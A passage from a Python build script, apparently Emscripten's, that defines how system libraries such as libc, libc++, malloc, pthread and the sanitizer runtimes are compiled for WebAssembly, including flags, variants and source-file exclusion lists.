return name
@classmethod
def vary_on(cls):
return super(MTLibrary, cls).vary_on() + ['is_mt']
@classmethod
def get_default_variation(cls, **kwargs):
return super(MTLibrary, cls).get_default_variation(is_mt=shared.Settings.USE_PTHREADS, **kwargs)
class exceptions(object):
"""
This represents the exception handling mode of Emscripten. Currently there are
three modes of exception handling:
- None: Does not handle exceptions. This includes -fno-exceptions, which
prevents both throwing and catching, and -fignore-exceptions, which only
allows throwing, but library-wise they use the same version.
- Emscripten: Emscripten provides exception handling capability using JS
emulation. This causes code size increase and performance degradation.
- Wasm: Wasm native exception handling support uses Wasm EH instructions and
is meant to be fast. You need to use a VM that has the EH support to use
this. This is not fully working yet and still experimental.
"""
none = 0
emscripten = 1
wasm = 2
class NoExceptLibrary(Library):
def __init__(self, **kwargs):
self.eh_mode = kwargs.pop('eh_mode')
super(NoExceptLibrary, self).__init__(**kwargs)
def can_build(self):
if not super(NoExceptLibrary, self).can_build():
return False
# Wasm exception handling is only supported in the wasm backend
return shared.Settings.WASM_BACKEND or self.eh_mode != exceptions.wasm
def can_use(self):
if not super(NoExceptLibrary, self).can_use():
return False
# Wasm exception handling is only supported in the wasm backend
return shared.Settings.WASM_BACKEND or self.eh_mode != exceptions.wasm
def get_cflags(self):
cflags = super(NoExceptLibrary, self).get_cflags()
if self.eh_mode == exceptions.none:
cflags += ['-fno-exceptions']
elif self.eh_mode == exceptions.emscripten:
cflags += ['-s', 'DISABLE_EXCEPTION_CATCHING=0']
elif self.eh_mode == exceptions.wasm:
cflags += ['-fwasm-exceptions']
return cflags
def get_base_name(self):
name = super(NoExceptLibrary, self).get_base_name()
# TODO Currently emscripten-based exception is the default mode, thus no
# suffixes. Change the default to wasm exception later.
if self.eh_mode == exceptions.none:
name += '-noexcept'
elif self.eh_mode == exceptions.wasm:
name += '-except'
return name
@classmethod
def variations(cls, **kwargs):
combos = super(NoExceptLibrary, cls).variations()
return ([dict(eh_mode=exceptions.none, **combo) for combo in combos] +
[dict(eh_mode=exceptions.emscripten, **combo) for combo in combos] +
[dict(eh_mode=exceptions.wasm, **combo) for combo in combos])
@classmethod
def get_default_variation(cls, **kwargs):
if shared.Settings.EXCEPTION_HANDLING:
eh_mode = exceptions.wasm
elif shared.Settings.DISABLE_EXCEPTION_CATCHING == 1:
eh_mode = exceptions.none
else:
eh_mode = exceptions.emscripten
return super(NoExceptLibrary, cls).get_default_variation(eh_mode=eh_mode, **kwargs)
class MuslInternalLibrary(Library):
includes = [
['system', 'lib', 'libc', 'musl', 'src', 'internal'],
]
cflags = [
'-D_XOPEN_SOURCE=700',
'-Wno-unused-result', # system call results are often ignored in musl, and in wasi that warns
]
class AsanInstrumentedLibrary(Library):
def __init__(self, **kwargs):
self.is_asan = kwargs.pop('is_asan', False)
super(AsanInstrumentedLibrary, self).__init__(**kwargs)
def get_cflags(self):
cflags = super(AsanInstrumentedLibrary, self).get_cflags()
if self.is_asan:
cflags += ['-fsanitize=address']
return cflags
def get_base_name(self):
name = super(AsanInstrumentedLibrary, self).get_base_name()
if self.is_asan:
name += '-asan'
return name
@classmethod
def vary_on(cls):
vary_on = super(AsanInstrumentedLibrary, cls).vary_on()
if shared.Settings.WASM_BACKEND:
vary_on += ['is_asan']
return vary_on
@classmethod
def get_default_variation(cls, **kwargs):
return super(AsanInstrumentedLibrary, cls).get_default_variation(is_asan=shared.Settings.USE_ASAN, **kwargs)
class CXXLibrary(Library):
emcc = shared.EMXX
class NoBCLibrary(Library):
# Some libraries cannot be compiled as .bc files. This is because .bc files will link in every
# object in the library. While the optimizer will readily optimize out most of the unused
# functions, things like global constructors that are linked in cannot be optimized out, even
# though they are not actually needed. If we use .a files for such libraries, only the object
# files, and by extension, their contained global constructors, that are actually needed will be
# linked in.
def get_ext(self):
return '.a'
class libcompiler_rt(Library):
name = 'libcompiler_rt'
# compiler_rt files can't currently be part of LTO although we are hoping to remove this
# restriction soon: https://reviews.llvm.org/D71738
force_object_files = True
cflags = ['-O2', '-fno-builtin']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'builtins']
if shared.Settings.WASM_BACKEND:
filelist = shared.path_from_root('system', 'lib', 'compiler-rt', 'filelist.txt')
src_files = open(filelist).read().splitlines()
src_files.append(shared.path_from_root('system', 'lib', 'compiler-rt', 'extras.c'))
else:
src_files = ['divdc3.c', 'divsc3.c', 'muldc3.c', 'mulsc3.c']
class libc(AsanInstrumentedLibrary, MuslInternalLibrary, MTLibrary):
name = 'libc'
depends = ['libcompiler_rt']
# Without -fno-builtin, LLVM can optimize away or convert calls to library
# functions to something else based on assumptions that they behave exactly
# like the standard library. This can cause unexpected bugs when we use our
# custom standard library. The same for other libc/libm builds.
cflags = ['-Os', '-fno-builtin']
# Hide several musl warnings that produce a lot of spam to unit test build
# server logs. TODO: When updating musl the next time, feel free to recheck
# which of their warnings might have been fixed, and which ones of these could
# be cleaned up.
cflags += ['-Wno-return-type', '-Wno-parentheses', '-Wno-ignored-attributes',
'-Wno-shift-count-overflow', '-Wno-shift-negative-value',
'-Wno-dangling-else', '-Wno-unknown-pragmas',
'-Wno-shift-op-parentheses', '-Wno-string-plus-int',
'-Wno-logical-op-parentheses', '-Wno-bitwise-op-parentheses',
'-Wno-visibility', '-Wno-pointer-sign', '-Wno-absolute-value',
'-Wno-empty-body']
def get_files(self):
libc_files = []
musl_srcdir = shared.path_from_root('system', 'lib', 'libc', 'musl', 'src')
# musl modules
blacklist = [
'ipc', 'passwd', 'thread', 'signal', 'sched', 'ipc', 'time', 'linux',
'aio', 'exit', 'legacy', 'mq', 'process', 'search', 'setjmp', 'env',
'ldso', 'conf'
]
# individual files
blacklist += [
'memcpy.c', 'memset.c', 'memmove.c', 'getaddrinfo.c', 'getnameinfo.c',
'inet_addr.c', 'res_query.c', 'res_querydomain.c', 'gai_strerror.c',
'proto.c', 'gethostbyaddr.c', 'gethostbyaddr_r.c', 'gethostbyname.c',
'gethostbyname2_r.c', 'gethostbyname_r.c', 'gethostbyname2.c',
'usleep.c', 'alarm.c', 'syscall.c', '_exit.c', 'popen.c',
'getgrouplist.c', 'initgroups.c', 'wordexp.c', 'timer_create.c',
'faccessat.c',
]
blacklist += LIBC_SOCKETS
# individual math files
blacklist += [
'abs.c', 'cos.c', 'cosf.c', 'cosl.c', 'sin.c', 'sinf.c', 'sinl.c',
'tan.c', 'tanf.c', 'tanl.c', 'acos.c', 'acosf.c', 'acosl.c', 'asin.c',
'asinf.c', 'asinl.c', 'atan.c', 'atanf.c', 'atanl.c', 'atan2.c',
'atan2f.c', 'atan2l.c', 'exp.c', 'expf.c', 'expl.c', 'log.c', 'logf.c',
'logl.c', 'sqrtl.c', 'round.c', 'roundf.c',
'fabsl.c', 'ceill.c', 'floorl.c', 'pow.c', 'powf.c', 'powl.c',
]
if self.is_asan:
# With ASan, we need to use specialized implementations of certain libc
# functions that do not rely on undefined behavior, for example, reading
# multiple bytes at once as an int and overflowing a buffer.
# Otherwise, ASan will catch these errors and terminate the program.
blacklist += ['strcpy.c', 'memchr.c', 'strchrnul.c', 'strlen.c',
'aligned_alloc.c', 'fcntl.c']
libc_files += [
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_strcpy.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_memchr.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_strchrnul.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_strlen.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_fcntl.c'),
]
if shared.Settings.WASM_BACKEND:
# With the wasm backend these are included in wasm_libc_rt instead
blacklist += [os.path.basename(f) for f in get_wasm_libc_rt_files()]
else:
blacklist += ['rintf.c', 'ceil.c', 'ceilf.c', 'floor.c', 'floorf.c',
'fabs.c', 'fabsf.c', 'sqrt.c', 'sqrtf.c']
blacklist = set(blacklist)
# TODO: consider using more math code from musl, doing so makes box2d faster
for dirpath, dirnames, filenames in os.walk(musl_srcdir):
for f in filenames:
if f.endswith('.c'):
if f in blacklist:
continue
dir_parts = os.path.split(dirpath)
cancel = False
for part in dir_parts:
if part in blacklist:
cancel = True
break
if not cancel:
libc_files.append(os.path.join(musl_srcdir, dirpath, f))
# Allowed files from blacklisted modules
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'time'],
filenames=['clock_settime.c'])
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'legacy'],
filenames=['getpagesize.c'])
if shared.Settings.WASM_BACKEND:
# See libc_extras below
# Include all the getenv stuff with the wasm backend. With fastcomp we
# still use JS because libc is a .bc file and we don't want to have a
# global constructor there for __environ, which would mean it is always
# included.
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'env'],
filenames=['__environ.c', 'getenv.c', 'putenv.c', 'setenv.c', 'unsetenv.c'])
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'sched'],
filenames=['sched_yield.c'])
libc_files += files_in_path(
path_components=['system', 'lib', 'libc'],
filenames=['extras.c', 'wasi-helpers.c'])
return libc_files
def get_depends(self):
depends = super(libc, self).get_depends()
if shared.Settings.WASM:
return depends + ['libc-wasm']
return depends
class libsockets(MuslInternalLibrary, MTLibrary):
name = 'libsockets'
symbols = set()
cflags = ['-Os', '-fno-builtin']
def get_files(self):
network_dir = shared.path_from_root('system', 'lib', 'libc', 'musl', 'src', 'network')
return [os.path.join(network_dir, x) for x in LIBC_SOCKETS]
class libsockets_proxy(MuslInternalLibrary, MTLibrary):
name = 'libsockets_proxy'
symbols = set()
cflags = ['-Os']
def get_files(self):
return [shared.path_from_root('system', 'lib', 'websocket', 'websocket_to_posix_socket.cpp'),
shared.path_from_root('system', 'lib', 'libc', 'musl', 'src', 'network', 'inet_addr.c')]
class libc_wasm(MuslInternalLibrary):
name = 'libc-wasm'
cflags = ['-O2', '-fno-builtin']
src_dir = ['system', 'lib', 'libc', 'musl', 'src', 'math']
src_files = ['cos.c', 'cosf.c', 'cosl.c', 'sin.c', 'sinf.c', 'sinl.c',
'tan.c', 'tanf.c', 'tanl.c', 'acos.c', 'acosf.c', 'acosl.c',
'asin.c', 'asinf.c', 'asinl.c', 'atan.c', 'atanf.c', 'atanl.c',
'atan2.c', 'atan2f.c', 'atan2l.c', 'exp.c', 'expf.c', 'expl.c',
'log.c', 'logf.c', 'logl.c', 'pow.c', 'powf.c', 'powl.c',
'sqrtl.c', 'ceill.c', 'floorl.c', 'fabsl.c']
def can_use(self):
# if building to wasm, we need more math code, since we have fewer builtins
return super(libc_wasm, self).can_use() and shared.Settings.WASM
class crt1(MuslInternalLibrary):
name = 'crt1'
cflags = ['-O2']
src_dir = ['system', 'lib', 'libc']
src_files = ['crt1.c']
force_object_files = True
def get_ext(self):
return '.o'
def can_use(self):
return super(crt1, self).can_use() and shared.Settings.STANDALONE_WASM
def can_build(self):
return super(crt1, self).can_build() and shared.Settings.WASM_BACKEND
class libc_extras(MuslInternalLibrary):
"""This library is separate from libc itself for fastcomp only so that the
constructor it contains can be DCE'd. Such tricks are not needed with
the wasm backend because it uses .o file linking granularity.
"""
name = 'libc-extras'
src_dir = ['system', 'lib', 'libc']
src_files = ['extras_fastcomp.c']
def can_build(self):
return super(libc_extras, self).can_build() and not shared.Settings.WASM_BACKEND
class libcxxabi(CXXLibrary, NoExceptLibrary, MTLibrary):
name = 'libc++abi'
cflags = [
'-Oz',
'-D_LIBCPP_DISABLE_VISIBILITY_ANNOTATIONS',
# Remove this once we update to include this llvm
# revision: https://reviews.llvm.org/D64961
'-D_LIBCXXABI_GUARD_ABI_ARM',
]
def get_depends(self):
if self.eh_mode == exceptions.wasm:
return ['libc', 'libunwind']
return ['libc']
def get_cflags(self):
cflags = super(libcxxabi, self).get_cflags()
cflags.append('-DNDEBUG')
if not self.is_mt:
cflags.append('-D_LIBCXXABI_HAS_NO_THREADS')
if self.eh_mode == exceptions.none:
cflags.append('-D_LIBCXXABI_NO_EXCEPTIONS')
elif self.eh_mode == exceptions.emscripten:
cflags.append('-D__USING_EMSCRIPTEN_EXCEPTIONS__')
elif self.eh_mode == exceptions.wasm:
cflags.append('-D__USING_WASM_EXCEPTIONS__')
return cflags
def get_files(self):
filenames = [
'abort_message.cpp',
'cxa_aux_runtime.cpp',
'cxa_default_handlers.cpp',
'cxa_demangle.cpp',
'cxa_exception_storage.cpp',
'cxa_guard.cpp',
'cxa_handlers.cpp',
'cxa_virtual.cpp',
'fallback_malloc.cpp',
'stdlib_new_delete.cpp',
'stdlib_exception.cpp',
'stdlib_stdexcept.cpp',
'stdlib_typeinfo.cpp',
'private_typeinfo.cpp'
]
if self.eh_mode == exceptions.none:
filenames += ['cxa_noexception.cpp']
elif self.eh_mode == exceptions.wasm:
filenames += [
'cxa_exception.cpp',
'cxa_noexception.cpp',
'cxa_personality.cpp'
]
return files_in_path(
path_components=['system', 'lib', 'libcxxabi', 'src'],
filenames=filenames)
class libcxx(NoBCLibrary, CXXLibrary, NoExceptLibrary, MTLibrary):
name = 'libc++'
depends = ['libc++abi']
cflags = ['-DLIBCXX_BUILDING_LIBCXXABI=1', '-D_LIBCPP_BUILDING_LIBRARY', '-Oz',
'-D_LIBCPP_DISABLE_VISIBILITY_ANNOTATIONS']
src_dir = ['system', 'lib', 'libcxx']
src_files = [
'algorithm.cpp',
'any.cpp',
'bind.cpp',
'charconv.cpp',
'chrono.cpp',
'condition_variable.cpp',
'condition_variable_destructor.cpp',
'debug.cpp',
'exception.cpp',
'functional.cpp',
'future.cpp',
'hash.cpp',
'ios.cpp',
'iostream.cpp',
'locale.cpp',
'memory.cpp',
'mutex.cpp',
'mutex_destructor.cpp',
'new.cpp',
'optional.cpp',
'random.cpp',
'regex.cpp',
'shared_mutex.cpp',
'stdexcept.cpp',
'string.cpp',
'strstream.cpp',
'system_error.cpp',
'thread.cpp',
'typeinfo.cpp',
'utility.cpp',
'valarray.cpp',
'variant.cpp',
'vector.cpp',
os.path.join('experimental', 'memory_resource.cpp'),
os.path.join('filesystem', 'directory_iterator.cpp'),
os.path.join('filesystem', 'int128_builtins.cpp'),
os.path.join('filesystem', 'operations.cpp')
]
class libunwind(CXXLibrary, NoExceptLibrary, MTLibrary):
name = 'libunwind'
cflags = ['-Oz', '-D_LIBUNWIND_DISABLE_VISIBILITY_ANNOTATIONS']
src_dir = ['system', 'lib', 'libunwind', 'src']
src_files = ['Unwind-wasm.cpp']
def __init__(self, **kwargs):
super(libunwind, self).__init__(**kwargs)
def can_build(self):
return super(libunwind, self).can_build() and shared.Settings.WASM_BACKEND
def can_use(self):
return super(libunwind, self).can_use() and shared.Settings.WASM_BACKEND and self.eh_mode == exceptions.wasm
def get_cflags(self):
cflags = super(libunwind, self).get_cflags()
cflags.append('-DNDEBUG')
if not self.is_mt:
cflags.append('-D_LIBUNWIND_HAS_NO_THREADS')
if self.eh_mode == exceptions.none:
cflags.append('-D_LIBUNWIND_HAS_NO_EXCEPTIONS')
elif self.eh_mode == exceptions.emscripten:
cflags.append('-D__USING_EMSCRIPTEN_EXCEPTIONS__')
elif self.eh_mode == exceptions.wasm:
cflags.append('-D__USING_WASM_EXCEPTIONS__')
return cflags
class libmalloc(MTLibrary, NoBCLibrary):
name = 'libmalloc'
cflags = ['-O2', '-fno-builtin']
def __init__(self, **kwargs):
self.malloc = kwargs.pop('malloc')
if self.malloc not in ('dlmalloc', 'emmalloc', 'none'):
raise Exception('malloc must be one of "emmalloc", "dlmalloc" or "none", see settings.js')
self.is_debug = kwargs.pop('is_debug')
self.use_errno = kwargs.pop('use_errno')
self.is_tracing = kwargs.pop('is_tracing')
self.use_64bit_ops = kwargs.pop('use_64bit_ops')
super(libmalloc, self).__init__(**kwargs)
def get_files(self):
malloc = shared.path_from_root('system', 'lib', {
'dlmalloc': 'dlmalloc.c', 'emmalloc': 'emmalloc.cpp'
}[self.malloc])
sbrk = shared.path_from_root('system', 'lib', 'sbrk.c')
return [malloc, sbrk]
def get_cflags(self):
cflags = super(libmalloc, self).get_cflags()
if self.is_debug:
cflags += ['-UNDEBUG', '-DDLMALLOC_DEBUG']
# TODO: consider adding -DEMMALLOC_DEBUG, but that is quite slow
else:
cflags += ['-DNDEBUG']
if not self.use_errno:
cflags += ['-DMALLOC_FAILURE_ACTION=', '-DEMSCRIPTEN_NO_ERRNO']
if self.is_tracing:
cflags += ['--tracing']
if self.use_64bit_ops:
cflags += ['-DEMMALLOC_USE_64BIT_OPS=1']
return cflags
def get_base_name_prefix(self):
return 'lib%s' % self.malloc
def get_base_name(self):
name = super(libmalloc, self).get_base_name()
if self.is_debug:
name += '-debug'
if not self.use_errno:
# emmalloc doesn't actually use errno, but it's easier to build it again
name += '-noerrno'
if self.is_tracing:
name += '-tracing'
if self.use_64bit_ops:
name += '-64bit'
return name
def can_use(self):
return super(libmalloc, self).can_use() and shared.Settings.MALLOC != 'none'
@classmethod
def vary_on(cls):
return super(libmalloc, cls).vary_on() + ['is_debug', 'use_errno', 'is_tracing', 'use_64bit_ops']
@classmethod
def get_default_variation(cls, **kwargs):
return super(libmalloc, cls).get_default_variation(
malloc=shared.Settings.MALLOC,
is_debug=shared.Settings.DEBUG_LEVEL >= 3,
use_errno=shared.Settings.SUPPORT_ERRNO,
is_tracing=shared.Settings.EMSCRIPTEN_TRACING,
use_64bit_ops=shared.Settings.MALLOC == 'emmalloc' and (shared.Settings.WASM == 1 or (shared.Settings.WASM_BACKEND and shared.Settings.WASM2JS == 0)),
**kwargs
)
@classmethod
def variations(cls):
combos = super(libmalloc, cls).variations()
return ([dict(malloc='dlmalloc', **combo) for combo in combos if not combo['use_64bit_ops']] +
[dict(malloc='emmalloc', **combo) for combo in combos])
class libal(Library):
name = 'libal'
depends = ['libc']
cflags = ['-Os']
src_dir = ['system', 'lib']
src_files = ['al.c']
class libgl(MTLibrary):
name = 'libgl'
depends = ['libc']
src_dir = ['system', 'lib', 'gl']
src_glob = '*.c'
cflags = ['-Oz']
def __init__(self, **kwargs):
self.is_legacy = kwargs.pop('is_legacy')
self.is_webgl2 = kwargs.pop('is_webgl2')
self.is_ofb = kwargs.pop('is_ofb')
self.is_full_es3 = kwargs.pop('is_full_es3')
super(libgl, self).__init__(**kwargs)
def get_base_name(self):
name = super(libgl, self).get_base_name()
if self.is_legacy:
name += '-emu'
if self.is_webgl2:
name += '-webgl2'
if self.is_ofb:
name += '-ofb'
if self.is_full_es3:
name += '-full_es3'
return name
def get_cflags(self):
cflags = super(libgl, self).get_cflags()
if self.is_legacy:
cflags += ['-DLEGACY_GL_EMULATION=1']
if self.is_webgl2:
cflags += ['-DMAX_WEBGL_VERSION=2', '-s', 'MAX_WEBGL_VERSION=2']
if self.is_ofb:
cflags += ['-D__EMSCRIPTEN_OFFSCREEN_FRAMEBUFFER__']
if self.is_full_es3:
cflags += ['-D__EMSCRIPTEN_FULL_ES3__']
return cflags
@classmethod
def vary_on(cls):
return super(libgl, cls).vary_on() + ['is_legacy', 'is_webgl2', 'is_ofb', 'is_full_es3']
@classmethod
def get_default_variation(cls, **kwargs):
return super(libgl, cls).get_default_variation(
is_legacy=shared.Settings.LEGACY_GL_EMULATION,
is_webgl2=shared.Settings.MAX_WEBGL_VERSION >= 2,
is_ofb=shared.Settings.OFFSCREEN_FRAMEBUFFER,
is_full_es3=shared.Settings.FULL_ES3,
**kwargs
)
class libembind(CXXLibrary):
name = 'libembind'
depends = ['libc++abi']
never_force = True
def __init__(self, **kwargs):
self.with_rtti = kwargs.pop('with_rtti', False)
super(libembind, self).__init__(**kwargs)
def get_cflags(self):
cflags = super(libembind, self).get_cflags()
if not self.with_rtti:
cflags += ['-fno-rtti', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']
return cflags
@classmethod
def vary_on(cls):
return super(libembind, cls).vary_on() + ['with_rtti']
def get_base_name(self):
name = super(libembind, self).get_base_name()
if self.with_rtti:
name += '-rtti'
return name
def get_files(self):
return [shared.path_from_root('system', 'lib', 'embind', 'bind.cpp')]
@classmethod
def get_default_variation(cls, **kwargs):
return super(libembind, cls).get_default_variation(with_rtti=shared.Settings.USE_RTTI, **kwargs)
class libfetch(CXXLibrary, MTLibrary):
name = 'libfetch'
depends = ['libc++abi']
never_force = True
def get_files(self):
return [shared.path_from_root('system', 'lib', 'fetch', 'emscripten_fetch.cpp')]
class libasmfs(CXXLibrary, MTLibrary):
name = 'libasmfs'
depends = ['libc++abi']
never_force = True
def get_files(self):
return [shared.path_from_root('system', 'lib', 'fetch', 'asmfs.cpp')]
def can_build(self):
# ASMFS is looking for a maintainer
# https://github.com/emscripten-core/emscripten/issues/9534
return True
class libhtml5(Library):
name = 'libhtml5'
cflags = ['-Oz']
src_dir = ['system', 'lib', 'html5']
src_glob = '*.c'
class libpthread(AsanInstrumentedLibrary, MuslInternalLibrary, MTLibrary):
name = 'libpthread'
depends = ['libc']
cflags = ['-O2']
def get_files(self):
if self.is_mt:
files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'thread'],
filenames=[
'pthread_attr_destroy.c', 'pthread_condattr_setpshared.c',
'pthread_mutex_lock.c', 'pthread_spin_destroy.c', 'pthread_attr_get.c',
'pthread_cond_broadcast.c', 'pthread_mutex_setprioceiling.c',
'pthread_spin_init.c', 'pthread_attr_init.c', 'pthread_cond_destroy.c',
'pthread_mutex_timedlock.c', 'pthread_spin_lock.c',
'pthread_attr_setdetachstate.c', 'pthread_cond_init.c',
'pthread_mutex_trylock.c', 'pthread_spin_trylock.c',
'pthread_attr_setguardsize.c', 'pthread_cond_signal.c',
'pthread_mutex_unlock.c', 'pthread_spin_unlock.c',
'pthread_attr_setinheritsched.c', 'pthread_cond_timedwait.c',
'pthread_once.c', 'sem_destroy.c', 'pthread_attr_setschedparam.c',
'pthread_cond_wait.c', 'pthread_rwlockattr_destroy.c', 'sem_getvalue.c',
'pthread_attr_setschedpolicy.c', 'pthread_equal.c', 'pthread_rwlockattr_init.c',
'sem_init.c', 'pthread_attr_setscope.c', 'pthread_getspecific.c',
'pthread_rwlockattr_setpshared.c', 'sem_open.c', 'pthread_attr_setstack.c',
'pthread_key_create.c', 'pthread_rwlock_destroy.c', 'sem_post.c',
'pthread_attr_setstacksize.c', 'pthread_mutexattr_destroy.c',
'pthread_rwlock_init.c', 'sem_timedwait.c', 'pthread_barrierattr_destroy.c',
'pthread_mutexattr_init.c', 'pthread_rwlock_rdlock.c', 'sem_trywait.c',
'pthread_barrierattr_init.c', 'pthread_mutexattr_setprotocol.c',
'pthread_rwlock_timedrdlock.c', 'sem_unlink.c',
'pthread_barrierattr_setpshared.c', 'pthread_mutexattr_setpshared.c',
'pthread_rwlock_timedwrlock.c', 'sem_wait.c', 'pthread_barrier_destroy.c',
'pthread_mutexattr_setrobust.c', 'pthread_rwlock_tryrdlock.c',
'__timedwait.c', 'pthread_barrier_init.c', 'pthread_mutexattr_settype.c',
'pthread_rwlock_trywrlock.c', 'vmlock.c', 'pthread_barrier_wait.c',
'pthread_mutex_consistent.c', 'pthread_rwlock_unlock.c', '__wait.c',
'pthread_condattr_destroy.c', 'pthread_mutex_destroy.c',
'pthread_rwlock_wrlock.c', 'pthread_condattr_init.c',
'pthread_mutex_getprioceiling.c', 'pthread_setcanceltype.c',
'pthread_condattr_setclock.c', 'pthread_mutex_init.c',
'pthread_setspecific.c', 'pthread_setcancelstate.c'
])
files += [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread.c')]
if shared.Settings.WASM_BACKEND:
files += [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread_wasm.c')]
else:
files += [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread_asmjs.c')]
return files
else:
return [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread_stub.c')]
def get_base_name_prefix(self):
return 'libpthread' if self.is_mt else 'libpthread_stub'
class CompilerRTWasmLibrary(Library):
cflags = ['-O2', '-fno-builtin']
# compiler_rt files can't currently be part of LTO although we are hoping to remove this
# restriction soon: https://reviews.llvm.org/D71738
force_object_files = True
def can_build(self):
return super(CompilerRTWasmLibrary, self).can_build() and shared.Settings.WASM_BACKEND
class libc_rt_wasm(AsanInstrumentedLibrary, CompilerRTWasmLibrary, MuslInternalLibrary):
name = 'libc_rt_wasm'
def get_files(self):
return get_wasm_libc_rt_files()
class libubsan_minimal_rt_wasm(CompilerRTWasmLibrary, MTLibrary):
name = 'libubsan_minimal_rt_wasm'
never_force = True
includes = [['system', 'lib', 'compiler-rt', 'lib']]
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'ubsan_minimal']
src_files = ['ubsan_minimal_handlers.cpp']
class libsanitizer_common_rt_wasm(CompilerRTWasmLibrary, MTLibrary):
name = 'libsanitizer_common_rt_wasm'
depends = ['libc++abi']
includes = [['system', 'lib', 'libc', 'musl', 'src', 'internal']]
js_depends = ['memalign', 'emscripten_builtin_memalign', '__data_end', '__heap_base']
never_force = True
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'sanitizer_common']
src_glob = '*.cc'
src_glob_exclude = ['sanitizer_common_nolibc.cc']
class SanitizerLibrary(CompilerRTWasmLibrary, MTLibrary):
depends = ['libsanitizer_common_rt_wasm']
never_force = True
includes = [['system', 'lib', 'compiler-rt', 'lib']]
src_glob = '*.cc'
class libubsan_rt_wasm(SanitizerLibrary):
name = 'libubsan_rt_wasm'
js_depends = ['emscripten_builtin_malloc', 'emscripten_builtin_free']
cflags = ['-DUBSAN_CAN_USE_CXXABI']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'ubsan']
class liblsan_common_rt_wasm(SanitizerLibrary):
name = 'liblsan_common_rt_wasm'
js_depends = ['__global_base']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'lsan']
src_glob = 'lsan_common*.cc'
class liblsan_rt_wasm(SanitizerLibrary):
name = 'liblsan_rt_wasm'
depends = ['liblsan_common_rt_wasm']
js_depends = ['emscripten_builtin_malloc', 'emscripten_builtin_free']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'lsan']
src_glob_exclude = ['lsan_common.cc', 'lsan_common_mac.cc', 'lsan_common_linux.cc',
'lsan_common_emscripten.cc']
class libasan_rt_wasm(SanitizerLibrary):
name = 'libasan_rt_wasm'
depends = ['liblsan_common_rt_wasm', 'libubsan_rt_wasm']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'asan']
# This library is used when STANDALONE_WASM is set. In that mode, we don't
# want to depend on JS, and so this library contains implementations of
# things that we'd normally do in JS. That includes some general things
# as well as some additional musl components (that normally we reimplement
# in JS as it's more efficient that way).
class libstandalonewasm(MuslInternalLibrary):
name = 'libstandalonewasm'
cflags = ['-Os']
src_dir = ['system', 'lib']
def __init__(self, **kwargs):
self.is_mem_grow = kwargs.pop('is_mem_grow')
super(libstandalonewasm, self).__init__(**kwargs)
def get_base_name(self):
name = super(libstandalonewasm, self).get_base_name()
if self.is_mem_grow:
name += '-memgrow'
return name
def get_cflags(self):
cflags = super(libstandalonewasm, self).get_cflags()
cflags += ['-DNDEBUG']
if self.is_mem_grow:
cflags += ['-D__EMSCRIPTEN_MEMORY_GROWTH__=1']
return cflags
@classmethod
def vary_on(cls):
return super(libstandalonewasm, cls).vary_on() + ['is_mem_grow']
@classmethod
def get_default_variation(cls, **kwargs):
return super(libstandalonewasm, cls).get_default_variation(
is_mem_grow=shared.Settings.ALLOW_MEMORY_GROWTH,
**kwargs
)
def get_files(self):
base_files = files_in_path(
path_components=['system', 'lib'],
filenames=['standalone_wasm.c'])
# It is more efficient to use JS methods for time, normally.
time_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'time'],
filenames=['strftime.c',
'__month_to_secs.c',
'__tm_to_secs.c',
'__tz.c',
'__year_to_secs.c',
'gettimeofday.c',
'localtime.c',
'localtime_r.c',
'gmtime.c',
'gmtime_r.c',
'nanosleep.c',
'mktime.c'])
# It is more efficient to use JS for __assert_fail, as it avoids always
# including fprintf etc.
exit_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'exit'],
filenames=['assert.c'])
conf_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'conf'],
filenames=['sysconf.c'])
return base_files + time_files + exit_files + conf_files
def can_build(self):
return super(libstandalonewasm, self).can_build() and shared.Settings.WASM_BACKEND
# If main() is not in EXPORTED_FUNCTIONS, it may be dce'd out. This can be
# confusing, so issue a warning.
def warn_on_unexported_main(symbolses):
if '_main' not in shared.Settings.EXPORTED_FUNCTIONS:
for symbols in symbolses:
if 'main' in symbols.defs:
logger.warning('main() is in the input files, but "_main" is not in EXPORTED_FUNCTIONS, which means it may be eliminated as dead code. Export it if you want main() to run.')
return
def calculate(temp_files, in_temp, stdout_, stderr_, forced=[]):
global stdout, stderr
stdout = stdout_
stderr = stderr_
# Set of libraries to include on the link line, as opposed to `force` which
# is the set of libraries to force include (with --whole-archive).
always_include = set()
# Setting this will only use the forced libs in EMCC_FORCE_STDLIBS. This avoids spending time checking
# for unresolved symbols in your project files, which can speed up linking, but if you do not have
# the proper list of actually needed libraries, errors can occur. See below for how we must
# export all the symbols in deps_info when using this option.
only_forced = os.environ.get('EMCC_ONLY_FORCED_STDLIBS')
if only_forced:
temp_files = []
# Add in some hacks for js libraries. If a js lib depends on a symbol provided by a C library, it must be
# added here, because our deps go only one way (each library here is checked, then we check the next
# in order - libc++, libcxextra, etc. - and then we run the JS compiler and provide extra symbols from
# library*.js files). But we cannot then go back to the C libraries if a new dep was added!
# TODO: Move all __deps from src/library*.js to deps_info.json, and use that single source of info
# both here and in the JS compiler.
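# As a sketch of the shape of that file (the symbol names below are
# hypothetical): an entry like "some_js_symbol": ["needed_c_symbol"] means
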